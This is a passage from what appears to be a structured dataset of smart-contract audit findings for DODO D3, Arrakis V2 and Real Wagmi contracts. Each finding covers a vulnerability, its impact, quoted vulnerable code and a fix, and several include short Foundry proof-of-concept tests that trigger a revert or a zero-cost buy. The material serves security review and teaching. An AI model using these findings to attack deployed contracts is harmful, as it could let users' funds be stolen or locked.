0 : tokenCumMap[toToken].cumulativeAsk;\\n```\\n\\nThis wrong assignment value definitely will mess up accounting balance, resulting unknown state will occure, which is not expected by the protocol\\nFor one case, this `getRangeOrderState` is being used in `querySellTokens` & `queryBuyTokens` which may later called from `sellToken` and `buyToken`. The issue is when calling `_contructTokenState` which can be reverted from `PMMRangeOrder` when buy or sell token\\n```\\nFile: PMMRangeOrder.sol\\n // B\\n tokenState.B = askOrNot ? tokenState.B0 - tokenMMInfo.cumulativeAsk : tokenState.B0 - tokenMMInfo.cumulativeBid;\\n```\\n\\nWhen the `tokenMMInfo.cumulativeBid` (which was wrongly assign from cumulativeAsk) is bigger than `tokenState.B0`, this will revertчFix the error to\\n```\\nFile: D3Trading.sol\\n roState.toTokenMMInfo.cumulativeBid =\\n// Remove the line below\\n// Remove the line below\\n: allFlag (toTokenIndex) & 1 == 0 ? 0 : tokenCumMap[toToken].cumulativeAsk;\\n// Add the line below\\n// Add the line below\\n: allFlag (toTokenIndex) & 1 == 0 ? 0 : tokenCumMap[toToken].cumulativeBid;\\n```\\nчThis wrong assignment value definitely will mess up accounting balance, resulting unknown state will occure, which is not expected by the protocol. For example reverting state showing a case above.ч```\\nFile: D3Trading.sol\\n roState.toTokenMMInfo.cumulativeBid =\\n allFlag (toTokenIndex) & 1 == 0 ? 0 : tokenCumMap[toToken].cumulativeAsk;\\n```\\n -D3VaultFunding#checkBadDebtAfterAccrue is inaccurate and can lead to further damage to both LP's and MMчmediumчD3VaultFunding#checkBadDebtAfterAccrue makes the incorrect assumption that a collateral ratio of less than 1e18 means that the pool has bad debt. Due to how collateral and debt weight affect the collateral ratio calculation a pool can have a collateral ratio less than 1e18 will still maintaining debt that is profitable to liquidate. 
The result of this is that the after this threshold has been passed, a pool can no longer be liquidate by anyone which can lead to continued losses that harm both the LPs and the MM being liquidated.\\nD3VaultFunding.sol#L382-L386\\n```\\n if (balance >= borrows) {\\n collateral += min(balance - borrows, info.maxCollateralAmount).mul(info.collateralWeight).mul(price);\\n } else {\\n debt += (borrows - balance).mul(info.debtWeight).mul(price);\\n }\\n```\\n\\nWhen calculating the collateral and debt values, the value of the collateral is adjusted by the collateralWeight and debtWeight respectively. This can lead to a position in which the collateral ratio is less than 1e18, which incorrectly signals the pool has bad debt via the checkBadDebtAfterAccrue check.\\nExample:\\n```\\nAssume a pool has the following balances and debts:\\n\\nToken A - 100 borrows 125 balance\\nToken B - 100 borrows 80 balance\\n\\nPrice A = 1\\ncollateralWeightA = 0.8\\n\\nPrice B = 1\\ndebtWeightB = 1.2\\n\\ncollateral = 25 * 1 * 0.8 = 20\\ndebt = 20 * 1 * 1.2 = 24\\n\\ncollateralRatio = 20/24 = 0.83\\n```\\n\\nThe problem here is that there is no bad debt at all and it is still profitable to liquidate this pool, even with a discount:\\n```\\nExcessCollateral = 125 - 100 = 25\\n\\n25 * 1 * 0.95 [DISCOUNT] = 23.75\\n\\nExcessDebt = 100 - 80 = 20\\n\\n20 * 1 = 20\\n```\\n\\nThe issue with this is that once this check has been triggered, no other market participants besides DODO can liquidate this position. This creates a significant inefficiency in the market that can easily to real bad debt being created for the pool. 
This bad debt is harmful to both the pool MM, who could have been liquidated with remaining collateral, and also the vault LPs who directly pay for the bad debt.чThe methodology of the bad debt check should be changed to remove collateral and debt weights to accurately indicate the presence of bad debt.чUnnecessary loss of funds to LPs and MMsч```\\n if (balance >= borrows) {\\n collateral += min(balance - borrows, info.maxCollateralAmount).mul(info.collateralWeight).mul(price);\\n } else {\\n debt += (borrows - balance).mul(info.debtWeight).mul(price);\\n }\\n```\\n -D3UserQuote#getUserQuote queries incorrect token for exchangeRate leading to inaccurate quota calculationsчmediumчA small typo in the valuation loop of D3UserQuote#getUserQuote uses the wrong variable leading to and incorrect quota being returned. The purpose of a quota is to mitigate risk of positions being too large. This incorrect assumption can dramatically underestimate the quota leading to oversized (and overrisk) positions.\\nD3UserQuota.sol#L75-L84\\n```\\n for (uint256 i = 0; i < tokenList.length; i++) {\\n address _token = tokenList[i];\\n (address assetDToken,,,,,,,,,,) = d3Vault.getAssetInfo(_token);\\n uint256 tokenBalance = IERC20(assetDToken).balanceOf(user);\\n if (tokenBalance > 0) {\\n tokenBalance = tokenBalance.mul(d3Vault.getExchangeRate(token)); <- @audit-issue queries token instead of _token\\n (uint256 tokenPrice, uint8 priceDecimal) = ID3Oracle(d3Vault._ORACLE_()).getOriginalPrice(_token);\\n usedQuota = usedQuota + tokenBalance * tokenPrice / 10 ** (priceDecimal+tokenDecimals);\\n }\\n }\\n```\\n\\nD3UserQuota.sol#L80 incorrectly uses token rather than _token as it should. 
This returns the wrong exchange rate which can dramatically alter the perceived token balance as well as the calculated quota.чChange variable from token to _token:\\n```\\n- tokenBalance = tokenBalance.mul(d3Vault.getExchangeRate(token));\\n+ tokenBalance = tokenBalance.mul(d3Vault.getExchangeRate(_token));\\n```\\nчQuota is calculated incorrectly leading to overly risky positions, which in turn can cause loss to the systemч```\\n for (uint256 i = 0; i < tokenList.length; i++) {\\n address _token = tokenList[i];\\n (address assetDToken,,,,,,,,,,) = d3Vault.getAssetInfo(_token);\\n uint256 tokenBalance = IERC20(assetDToken).balanceOf(user);\\n if (tokenBalance > 0) {\\n tokenBalance = tokenBalance.mul(d3Vault.getExchangeRate(token)); <- @audit-issue queries token instead of _token\\n (uint256 tokenPrice, uint8 priceDecimal) = ID3Oracle(d3Vault._ORACLE_()).getOriginalPrice(_token);\\n usedQuota = usedQuota + tokenBalance * tokenPrice / 10 ** (priceDecimal+tokenDecimals);\\n }\\n }\\n```\\n -Calculation B0 meets devision 0 error when a token has small decimal and high price with a small kBidчmediumчHere is poc\\n```\\n function testQueryFail() public {\\n token1ChainLinkOracle.feedData(30647 * 1e18);\\n token2ChainLinkOracle.feedData(1 * 1e18);\\n vm.startPrank(maker);\\n uint32[] memory tokenKs = new uint32[](2);\\n tokenKs[0] = 0;\\n tokenKs[1] = (1<< 16) +1;\\n address[] memory tokens = new address[](2);\\n tokens[0] = address(token2);\\n tokens[1] = address(token1);\\n address[] memory slotIndex = new address[](2);\\n slotIndex[0] = address(token1);\\n slotIndex[1] = address(token2);\\n uint80[] memory priceSlot = new uint80[](2);\\n priceSlot[0] = 2191925019632266903652;\\n priceSlot[1] = 720435765840878108682;\\n\\n uint64[] memory amountslot = new uint64[](2);\\n amountslot[0] = stickAmount(10,8, 400000, 18);\\n amountslot[1] = stickAmount(400000, 18, 400000, 18);\\n d3MakerWithPool.setTokensKs(tokens, tokenKs);\\n d3MakerWithPool.setTokensPrice(slotIndex, 
priceSlot);\\n d3MakerWithPool.setTokensAmounts(slotIndex, amountslot);\\n vm.stopPrank();\\n\\n (uint256 askDownPrice, uint256 askUpPrice, uint256 bidDownPrice, uint256 bidUpPrice, uint256 swapFee) =\\n d3MM.getTokenMMPriceInfoForRead(address(token1));\\n assertEq(askDownPrice, 304555028000000000000000000000000);\\n assertEq(askUpPrice, 307231900000000000000000000000000);\\n assertEq(bidDownPrice, 3291);\\n assertEq(bidUpPrice, 3320);\\n assertEq(swapFee, 1200000000000000);\\n\\n //console.log(askDownPrice);\\n //console.log(askUpPrice);\\n //console.log(bidDownPrice);\\n //console.log(bidUpPrice);\\n //console.log(swapFee);\\n\\n (,,uint kask, uint kbid,,) = d3MM.getTokenMMOtherInfoForRead(address(token1));\\n assertEq(kask, 1e14);\\n assertEq(kbid, 1e14);\\n\\n (askDownPrice, askUpPrice, bidDownPrice, bidUpPrice, swapFee) =\\n d3MM.getTokenMMPriceInfoForRead(address(token2));\\n assertEq(askDownPrice, 999999960000000000);\\n assertEq(askUpPrice, 1000799800000000000);\\n assertEq(bidDownPrice, 1000400120032008002);\\n assertEq(bidUpPrice, 1001201241249250852);\\n assertEq(swapFee, 200000000000000);\\n\\n (,,kask, kbid,,) = d3MM.getTokenMMOtherInfoForRead(address(token2));\\n assertEq(kask, 0);\\n assertEq(kbid, 0);\\n\\n //console.log(askDownPrice);\\n //console.log(askUpPrice);\\n //console.log(bidDownPrice);\\n //console.log(bidUpPrice);\\n //console.log(swapFee);\\n //console.log(kask);\\n //console.log(kbid);\\n\\n SwapCallbackData memory swapData;\\n swapData.data = \"\";\\n swapData.payer = user1;\\n\\n //uint256 gasleft1 = gasleft();\\n uint256 receiveToToken = d3Proxy.sellTokens(\\n address(d3MM),\\n user1,\\n address(token1),\\n address(token2),\\n 1000000,\\n 0,\\n abi.encode(swapData),\\n block.timestamp + 1000\\n );\\n```\\n\\nIt will revert. 
In this example, wbtc price is 30445, and k = 0.0001, suppose maker contains rules, but model is invalid.чFix formula for this corner case, like making temp2 = 1\\nImprove calculation accuracy by consistently using precision 18 for calculations and converting to real decimal when processing amounts.чMaker sets right parameters but traders can't swap. It will make swap model invalid.\\nTool Used\\nManual Reviewч```\\n function testQueryFail() public {\\n token1ChainLinkOracle.feedData(30647 * 1e18);\\n token2ChainLinkOracle.feedData(1 * 1e18);\\n vm.startPrank(maker);\\n uint32[] memory tokenKs = new uint32[](2);\\n tokenKs[0] = 0;\\n tokenKs[1] = (1<< 16) +1;\\n address[] memory tokens = new address[](2);\\n tokens[0] = address(token2);\\n tokens[1] = address(token1);\\n address[] memory slotIndex = new address[](2);\\n slotIndex[0] = address(token1);\\n slotIndex[1] = address(token2);\\n uint80[] memory priceSlot = new uint80[](2);\\n priceSlot[0] = 2191925019632266903652;\\n priceSlot[1] = 720435765840878108682;\\n\\n uint64[] memory amountslot = new uint64[](2);\\n amountslot[0] = stickAmount(10,8, 400000, 18);\\n amountslot[1] = stickAmount(400000, 18, 400000, 18);\\n d3MakerWithPool.setTokensKs(tokens, tokenKs);\\n d3MakerWithPool.setTokensPrice(slotIndex, priceSlot);\\n d3MakerWithPool.setTokensAmounts(slotIndex, amountslot);\\n vm.stopPrank();\\n\\n (uint256 askDownPrice, uint256 askUpPrice, uint256 bidDownPrice, uint256 bidUpPrice, uint256 swapFee) =\\n d3MM.getTokenMMPriceInfoForRead(address(token1));\\n assertEq(askDownPrice, 304555028000000000000000000000000);\\n assertEq(askUpPrice, 307231900000000000000000000000000);\\n assertEq(bidDownPrice, 3291);\\n assertEq(bidUpPrice, 3320);\\n assertEq(swapFee, 1200000000000000);\\n\\n //console.log(askDownPrice);\\n //console.log(askUpPrice);\\n //console.log(bidDownPrice);\\n //console.log(bidUpPrice);\\n //console.log(swapFee);\\n\\n (,,uint kask, uint kbid,,) = 
d3MM.getTokenMMOtherInfoForRead(address(token1));\\n assertEq(kask, 1e14);\\n assertEq(kbid, 1e14);\\n\\n (askDownPrice, askUpPrice, bidDownPrice, bidUpPrice, swapFee) =\\n d3MM.getTokenMMPriceInfoForRead(address(token2));\\n assertEq(askDownPrice, 999999960000000000);\\n assertEq(askUpPrice, 1000799800000000000);\\n assertEq(bidDownPrice, 1000400120032008002);\\n assertEq(bidUpPrice, 1001201241249250852);\\n assertEq(swapFee, 200000000000000);\\n\\n (,,kask, kbid,,) = d3MM.getTokenMMOtherInfoForRead(address(token2));\\n assertEq(kask, 0);\\n assertEq(kbid, 0);\\n\\n //console.log(askDownPrice);\\n //console.log(askUpPrice);\\n //console.log(bidDownPrice);\\n //console.log(bidUpPrice);\\n //console.log(swapFee);\\n //console.log(kask);\\n //console.log(kbid);\\n\\n SwapCallbackData memory swapData;\\n swapData.data = \"\";\\n swapData.payer = user1;\\n\\n //uint256 gasleft1 = gasleft();\\n uint256 receiveToToken = d3Proxy.sellTokens(\\n address(d3MM),\\n user1,\\n address(token1),\\n address(token2),\\n 1000000,\\n 0,\\n abi.encode(swapData),\\n block.timestamp + 1000\\n );\\n```\\n -When swapping 18-decimal token to 8-decimal token , user could buy decimal-18-token with 0 amount of decimal-8-tokenчmediumчHere is the poc:\\n```\\nuint256 payFromToken = d3Proxy.buyTokens(\\n address(d3MM),\\n user1,\\n address(token1),\\n address(token2),\\n 10000000,\\n 0,\\n abi.encode(swapData),\\n block.timestamp + 1000\\n );\\nassertEq(payFromToken, 0);\\n```\\nчIn buyToken() of D3Trading.sol, add this rule:\\n```\\nif(payFromAmount == 0) { // value too small\\n payFromAmount = 1;\\n }\\n```\\nчIt may cause unexpected loss\\nTool Used\\nManual Reviewч```\\nuint256 payFromToken = d3Proxy.buyTokens(\\n address(d3MM),\\n user1,\\n address(token1),\\n address(token2),\\n 10000000,\\n 0,\\n abi.encode(swapData),\\n block.timestamp + 1000\\n );\\nassertEq(payFromToken, 0);\\n```\\n -ArrakisV2Router#addLiquidityPermit2 will strand ETHчhighчInside ArrakisV2Router#addLiquidityPermit2, 
`isToken0Weth` is set incorrectly leading to the wrong amount of ETH being refunded to the user\\nArrakisV2Router.sol#L278-L298\\n```\\n bool isToken0Weth;\\n _permit2Add(params_, amount0, amount1, token0, token1);\\n\\n _addLiquidity(\\n params_.addData.vault,\\n amount0,\\n amount1,\\n sharesReceived,\\n params_.addData.gauge,\\n params_.addData.receiver,\\n token0,\\n token1\\n );\\n\\n if (msg.value > 0) {\\n if (isToken0Weth && msg.value > amount0) {\\n payable(msg.sender).sendValue(msg.value - amount0);\\n } else if (!isToken0Weth && msg.value > amount1) {\\n payable(msg.sender).sendValue(msg.value - amount1);\\n }\\n }\\n```\\n\\nAbove we see that excess msg.value is returned to the user at the end of the function. This uses the value of `isToken0Weth` to determine the amount to send back to the user. The issue is that `isToken0Weth` is set incorrectly and will lead to ETH being stranded in the contract. `isToken0Weth` is never set, it will always be `false`. This means that when WETH actually is token0 the incorrect amount of ETH will be sent back to the user.\\nThis same issue can also be used to steal the ETH left in the contract by a malicious user. 
To make matters worse, the attacker can manipulate the underlying pools to increase the amount of ETH left in the contract so they can steal even more.чMove `isToken0Weth` and set it correctly:\\n```\\n- bool isToken0Weth;\\n _permit2Add(params_, amount0, amount1, token0, token1);\\n\\n _addLiquidity(\\n params_.addData.vault,\\n amount0,\\n amount1,\\n sharesReceived,\\n params_.addData.gauge,\\n params_.addData.receiver,\\n token0,\\n token1\\n );\\n\\n if (msg.value > 0) {\\n+ bool isToken0Weth = _isToken0Weth(address(token0), address(token1));\\n if (isToken0Weth && msg.value > amount0) {\\n payable(msg.sender).sendValue(msg.value - amount0);\\n } else if (!isToken0Weth && msg.value > amount1) {\\n payable(msg.sender).sendValue(msg.value - amount1);\\n }\\n }\\n```\\nчETH will be stranded in contract and stolenч```\\n bool isToken0Weth;\\n _permit2Add(params_, amount0, amount1, token0, token1);\\n\\n _addLiquidity(\\n params_.addData.vault,\\n amount0,\\n amount1,\\n sharesReceived,\\n params_.addData.gauge,\\n params_.addData.receiver,\\n token0,\\n token1\\n );\\n\\n if (msg.value > 0) {\\n if (isToken0Weth && msg.value > amount0) {\\n payable(msg.sender).sendValue(msg.value - amount0);\\n } else if (!isToken0Weth && msg.value > amount1) {\\n payable(msg.sender).sendValue(msg.value - amount1);\\n }\\n }\\n```\\n -Then getAmountsForDelta function at Underlying.sol is implemented incorrectlyчmediumчThe function `getAmountsForDelta()` at the `Underlying.sol` contract is used to compute the quantity of `token0` and `token1` to add to the position given a delta of liquidity. These quantities depend on the delta of liquidity, the current tick and the ticks of the range boundaries. 
Actually, `getAmountsForDelta()` uses the sqrt prices instead of the ticks, but they are equivalent since each tick represents a sqrt price.\\nThere exists 3 cases:\\nThe current tick is outside the range from the left, this means only `token0` should be added.\\nThe current tick is within the range, this means both `token0` and `token1` should be added.\\nThe current tick is outside the range from the right, this means only `token1` should be added.\\nThe issue on the implementation is on the first case, which is coded as follows:\\n```\\nif (sqrtRatioX96 <= sqrtRatioAX96) {\\n amount0 = SafeCast.toUint256(\\n SqrtPriceMath.getAmount0Delta(\\n sqrtRatioAX96,\\n sqrtRatioBX96,\\n liquidity\\n )\\n );\\n} \\n```\\n\\nThe implementation says that if the current price is equal to the price of the lower tick, it means that it is outside of the range and hence only `token0` should be added to the position.\\nBut for the UniswapV3 implementation, the current price must be lower in order to consider it outside:\\n```\\nif (_slot0.tick < params.tickLower) {\\n // current tick is below the passed range; liquidity can only become in range by crossing from left to\\n // right, when we'll need _more_ token0 (it's becoming more valuable) so user must provide it\\n amount0 = SqrtPriceMath.getAmount0Delta(\\n TickMath.getSqrtRatioAtTick(params.tickLower),\\n TickMath.getSqrtRatioAtTick(params.tickUpper),\\n params.liquidityDelta\\n );\\n}\\n```\\n\\nReferenceчChange from:\\n```\\n// @audit-issue Change <= to <.\\nif (sqrtRatioX96 <= sqrtRatioAX96) {\\n amount0 = SafeCast.toUint256(\\n SqrtPriceMath.getAmount0Delta(\\n sqrtRatioAX96,\\n sqrtRatioBX96,\\n liquidity\\n )\\n );\\n}\\n```\\n\\nto:\\n```\\nif (sqrtRatioX96 < sqrtRatioAX96) {\\n amount0 = SafeCast.toUint256(\\n SqrtPriceMath.getAmount0Delta(\\n sqrtRatioAX96,\\n sqrtRatioBX96,\\n liquidity\\n )\\n );\\n}\\n```\\nчWhen the current price is equal to the left boundary of the range, the uniswap pool will request both 
`token0` and `token1`, but arrakis will only request from the user `token0` so the pool will lose some `token1` if it has enough to cover it.ч```\\nif (sqrtRatioX96 <= sqrtRatioAX96) {\\n amount0 = SafeCast.toUint256(\\n SqrtPriceMath.getAmount0Delta(\\n sqrtRatioAX96,\\n sqrtRatioBX96,\\n liquidity\\n )\\n );\\n} \\n```\\n -outdated variable is not effective to check price feed timelinessчmediumчIn ChainlinkOraclePivot, it uses one `outdated` variable to check if the two price feeds are `outdated`. However, this is not effective because the price feeds have different update frequencies.\\nLet's have an example:\\nIn Polygon mainnet, ChainlinkOraclePivot uses two Chainlink price feeds: MATIC/ETH and ETH/USD.\\nWe can see that\\nIn function `_getLatestRoundData`, both price feeds use the same `outdated` variable.\\nIf we set the `outdated` variable to 27s, the priceFeedA will revert most of the time since it is too short for the 86400s heartbeat.\\nIf we set the `outdated` variable to 86400s, the priceFeedB can have a very `outdated` value without revert.\\n```\\n try priceFeedA.latestRoundData() returns (\\n uint80,\\n int256 price,\\n uint256,\\n uint256 updatedAt,\\n uint80\\n ) {\\n require(\\n block.timestamp - updatedAt <= outdated, // solhint-disable-line not-rely-on-time\\n \"ChainLinkOracle: priceFeedA outdated.\"\\n );\\n\\n priceA = SafeCast.toUint256(price);\\n } catch {\\n revert(\"ChainLinkOracle: price feed A call failed.\");\\n }\\n\\n try priceFeedB.latestRoundData() returns (\\n uint80,\\n int256 price,\\n uint256,\\n uint256 updatedAt,\\n uint80\\n ) {\\n require(\\n block.timestamp - updatedAt <= outdated, // solhint-disable-line not-rely-on-time\\n \"ChainLinkOracle: priceFeedB outdated.\"\\n );\\n\\n priceB = SafeCast.toUint256(price);\\n } catch {\\n revert(\"ChainLinkOracle: price feed B call failed.\");\\n }\\n```\\nчHaving two `outdated` values for each price feed A and B.чThe `outdated` variable is not effective to check the timeliness of 
prices. It can allow stale prices in one price feed or always revert in another price feed.ч```\\n try priceFeedA.latestRoundData() returns (\\n uint80,\\n int256 price,\\n uint256,\\n uint256 updatedAt,\\n uint80\\n ) {\\n require(\\n block.timestamp - updatedAt <= outdated, // solhint-disable-line not-rely-on-time\\n \"ChainLinkOracle: priceFeedA outdated.\"\\n );\\n\\n priceA = SafeCast.toUint256(price);\\n } catch {\\n revert(\"ChainLinkOracle: price feed A call failed.\");\\n }\\n\\n try priceFeedB.latestRoundData() returns (\\n uint80,\\n int256 price,\\n uint256,\\n uint256 updatedAt,\\n uint80\\n ) {\\n require(\\n block.timestamp - updatedAt <= outdated, // solhint-disable-line not-rely-on-time\\n \"ChainLinkOracle: priceFeedB outdated.\"\\n );\\n\\n priceB = SafeCast.toUint256(price);\\n } catch {\\n revert(\"ChainLinkOracle: price feed B call failed.\");\\n }\\n```\\n -Update to `managerFeeBPS` applied to pending tokens yet to be claimedчmediumчA manager (malicious or not) can update the `managerFeeBPS` by calling `ArrakisV2.setManagerFeeBPS()`. 
The newly-updated `managerFeeBPS` will be retroactively applied to the pending fees yet to be claimed by the `ArrakisV2` contract.\\nWhenever UniV3 fees are collected (via `burn()` or rebalance()), the manager fees are applied to the received pending tokens.\\n```\\nfunction _applyFees(uint256 fee0_, uint256 fee1_) internal {\\n uint16 mManagerFeeBPS = managerFeeBPS;\\n managerBalance0 += (fee0_ * mManagerFeeBPS) / hundredPercent;\\n managerBalance1 += (fee1_ * mManagerFeeBPS) / hundredPercent;\\n}\\n```\\n\\nSince the manager can update the `managerFeeBPS` whenever, this calculation can be altered to take up to 100% of the pending fees in favor of the manager.\\n```\\nfunction setManagerFeeBPS(uint16 managerFeeBPS_) external onlyManager {\\n require(managerFeeBPS_ <= 10000, \"MFO\");\\n managerFeeBPS = managerFeeBPS_;\\n emit LogSetManagerFeeBPS(managerFeeBPS_);\\n}\\n```\\nчFees should be collected at the start of execution within the `setManagerFeeBPS()` function. This effectively checkpoints the fees properly, prior to updating the `managerFeeBPS` variable.чManager's ability to intentionally or accidently steal pending fees owed to stakersч```\\nfunction _applyFees(uint256 fee0_, uint256 fee1_) internal {\\n uint16 mManagerFeeBPS = managerFeeBPS;\\n managerBalance0 += (fee0_ * mManagerFeeBPS) / hundredPercent;\\n managerBalance1 += (fee1_ * mManagerFeeBPS) / hundredPercent;\\n}\\n```\\n -Wrong calculation of `tickCumulatives` due to hardcoded pool feesчhighчWrong calculation of `tickCumulatives` due to hardcoded pool fees\\nReal Wagmi is using a hardcoded `500` fee to calculate the `amountOut` to check for slippage and revert if it was to high, or got less funds back than expected.\\n```\\n IUniswapV3Pool(underlyingTrustedPools[500].poolAddress)\\n```\\n\\nThere are several problems with the hardcoding of the `500` as the fee.\\nNot all tokens have `500` fee pools\\nThe swapping takes place in pools that don't have a `500` fee\\nThe `500` pool fee is not the 
optimal to fetch the `tickCumulatives` due to low volume\\nEspecially as they are deploying in so many secondary chains like Kava, this will be a big problem pretty much in every transaction over there.\\nIf any of those scenarios occurs, `tickCumulatives` will be incorrectly calculated and it will set an incorrect slippage return.чConsider allowing the fees as an input and consider not even picking low TVL pools with no transactionsчIncorrect slippage calculation will increase the risk of `rebalanceAll()` rebalance getting rekt.ч```\\n IUniswapV3Pool(underlyingTrustedPools[500].poolAddress)\\n```\\n -No slippage protection when withdrawing and providing liquidity in rebalanceAllчhighчWhen `rebalanceAll` is called, the liquidity is first withdrawn from the pools and then deposited to new positions. However, there is no slippage protection for these operations.\\nIn the `rebalanceAll` function, it first withdraws all liquidity from the pools and deposits all liquidity to new positions.\\n```\\n _withdraw(_totalSupply, _totalSupply);\\n```\\n\\n```\\n _deposit(reserve0, reserve1, _totalSupply, slots);\\n```\\n\\nHowever, there are no parameters for `amount0Min` and `amount1Min`, which are used to prevent slippage. 
These parameters should be checked to create slippage protections.\\nActually, they are implemented in the `deposit` and `withdraw` functions, but just not in the rebalanceAll function.чImplement slippage protection in rebalanceAll as suggested to avoid loss to the protocol.чThe withdraw and provide liquidity operations in rebalanceAll are exposed to high slippage and could result in a loss for LPs of multipool.ч```\\n _withdraw(_totalSupply, _totalSupply);\\n```\\n -Usage of `slot0` is extremely easy to manipulateчhighчUsage of `slot0` is extremely easy to manipulate\\nReal Wagmi is using `slot0` to calculate several variables in their codebase:\\nslot0 is the most recent data point and is therefore extremely easy to manipulate.\\nMultipool directly uses the token values returned by `getAmountsForLiquidity`\\n```\\n (uint256 amount0, uint256 amount1) = LiquidityAmounts.getAmountsForLiquidity(\\n slots[i].currentSqrtRatioX96,\\n TickMath.getSqrtRatioAtTick(position.lowerTick),\\n TickMath.getSqrtRatioAtTick(position.upperTick),\\n liquidity\\n );\\n```\\n\\nto calculate the reserves.\\n```\\n reserve0 += amount0;\\n reserve1 += amount1;\\n```\\nчTo make any calculation use a TWAP instead of slot0.чPool lp value can be manipulated and cause other users to receive less lp tokens.ч```\\n (uint256 amount0, uint256 amount1) = LiquidityAmounts.getAmountsForLiquidity(\\n slots[i].currentSqrtRatioX96,\\n TickMath.getSqrtRatioAtTick(position.lowerTick),\\n TickMath.getSqrtRatioAtTick(position.upperTick),\\n liquidity\\n );\\n```\\n -The `_estimateWithdrawalLp` function might return a very large value, result in users losing significant incentives or being unable to withdraw from the Dispatcher contractчhighчThe `_estimateWithdrawalLp` function might return a very large value, result in users losing significant incentives or being unable to withdraw from the Dispatcher contract\\nIn Dispatcher contract, `_estimateWithdrawalLp` function returns the value of shares amount 
based on the average of ratios `amount0 / reserve0` and `amount1 / reserve1`.\\n```\\nfunction _estimateWithdrawalLp(\\n uint256 reserve0,\\n uint256 reserve1,\\n uint256 _totalSupply,\\n uint256 amount0,\\n uint256 amount1\\n) private pure returns (uint256 shareAmount) {\\n shareAmount =\\n ((amount0 * _totalSupply) / reserve0 + (amount1 * _totalSupply) / reserve1) /\\n 2;\\n}\\n```\\n\\nFrom `Dispatcher.withdraw` and `Dispatcher.deposit` function, amount0 and amount1 will be the accumulated fees of users\\n```\\nuint256 lpAmount;\\n{\\n (uint256 fee0, uint256 fee1) = _calcFees(feesGrow, user);\\n lpAmount = _estimateWithdrawalLp(reserve0, reserve1, _totalSupply, fee0, fee1);\\n}\\nuser.shares -= lpAmount;\\n_withdrawFee(pool, lpAmount, reserve0, reserve1, _totalSupply, deviationBP);\\n```\\n\\nHowever, it is important to note that the values of reserve0 and reserve1 can fluctuate significantly. This is because the positions of the Multipool in UniSwapV3 pools (concentrated) are unstable on-chain, and they can change substantially as the state of the pools changes. As a result, the `_estimateWithdrawalLp` function might return a large value even for a small fee amount. 
This could potentially lead to reverting due to underflow in the deposit function (in cases where lpAmount > user.shares), or it could result in withdrawing a larger amount of Multipool LP than initially expected.\\nScenario:\\nTotal supply of Multipool is 1e18, and Alice has 1e16 (1%) LP amounts which deposited into Dispatcher contract.\\nAlice accrued fees = 200 USDC and 100 USDT\\nThe reserves of Multipool are 100,000 USDC and 100,000 USDT, `_estimateWithdrawalLp` of Alice fees will be `(0.2% + 0.1%) / 2 * totalSupply` = `0.15% * totalSupply` = 1.5e15 LP amounts\\nHowever, in some cases, UniSwapV3 pools may experience fluctuations, reserves of Multipool are 10,000 USDC and 190,000 USDT, `_estimateWithdrawalLp` of Alice fees will be `(2% + 0.052%) / 2 * totalSupply` = `1.026% * totalSupply` = 1.026e16 LP amounts This result is greater than LP amounts of Alice (1e16), leading to reverting by underflow in deposit/withdraw function of Dispatcher contract.чShouldn't use the average ratio for calculation in_estimateWithdrawalLp functionчUsers may face 2 potential issues when interacting with the Dispatcher contract.\\nThey might be unable to deposit/withdraw\\nSecondly, users could potentially lose significant incentives when depositing or withdrawing due to unexpected withdrawals of LP amounts for their fees.ч```\\nfunction _estimateWithdrawalLp(\\n uint256 reserve0,\\n uint256 reserve1,\\n uint256 _totalSupply,\\n uint256 amount0,\\n uint256 amount1\\n) private pure returns (uint256 shareAmount) {\\n shareAmount =\\n ((amount0 * _totalSupply) / reserve0 + (amount1 * _totalSupply) / reserve1) /\\n 2;\\n}\\n```\\n -The deposit - withdraw - trade transaction lack of expiration timestamp check (DeadLine check)чmediumчThe deposit - withdraw - trade transaction lack of expiration timestamp check (DeadLine check)\\nthe protocol missing the DEADLINE check at all in logic.\\nthis is actually how uniswap implemented the Deadline, this protocol also need deadline check like 
this logic\\n```\\n// **** ADD LIQUIDITY ****\\nfunction _addLiquidity(\\n address tokenA,\\n address tokenB,\\n uint amountADesired,\\n uint amountBDesired,\\n uint amountAMin,\\n uint amountBMin\\n) internal virtual returns (uint amountA, uint amountB) {\\n // create the pair if it doesn't exist yet\\n if (IUniswapV2Factory(factory).getPair(tokenA, tokenB) == address(0)) {\\n IUniswapV2Factory(factory).createPair(tokenA, tokenB);\\n }\\n (uint reserveA, uint reserveB) = UniswapV2Library.getReserves(factory, tokenA, tokenB);\\n if (reserveA == 0 && reserveB == 0) {\\n (amountA, amountB) = (amountADesired, amountBDesired);\\n } else {\\n uint amountBOptimal = UniswapV2Library.quote(amountADesired, reserveA, reserveB);\\n if (amountBOptimal <= amountBDesired) {\\n require(amountBOptimal >= amountBMin, 'UniswapV2Router: INSUFFICIENT_B_AMOUNT');\\n (amountA, amountB) = (amountADesired, amountBOptimal);\\n } else {\\n uint amountAOptimal = UniswapV2Library.quote(amountBDesired, reserveB, reserveA);\\n assert(amountAOptimal <= amountADesired);\\n require(amountAOptimal >= amountAMin, 'UniswapV2Router: INSUFFICIENT_A_AMOUNT');\\n (amountA, amountB) = (amountAOptimal, amountBDesired);\\n }\\n }\\n}\\n\\nfunction addLiquidity(\\n address tokenA,\\n address tokenB,\\n uint amountADesired,\\n uint amountBDesired,\\n uint amountAMin,\\n uint amountBMin,\\n address to,\\n uint deadline\\n) external virtual override ensure(deadline) returns (uint amountA, uint amountB, uint liquidity) {\\n (amountA, amountB) = _addLiquidity(tokenA, tokenB, amountADesired, amountBDesired, amountAMin, amountBMin);\\n address pair = UniswapV2Library.pairFor(factory, tokenA, tokenB);\\n TransferHelper.safeTransferFrom(tokenA, msg.sender, pair, amountA);\\n TransferHelper.safeTransferFrom(tokenB, msg.sender, pair, amountB);\\n liquidity = IUniswapV2Pair(pair).mint(to);\\n}\\n```\\n\\nthe point is the deadline check\\n```\\nmodifier ensure(uint deadline) {\\n require(deadline >= block.timestamp, 
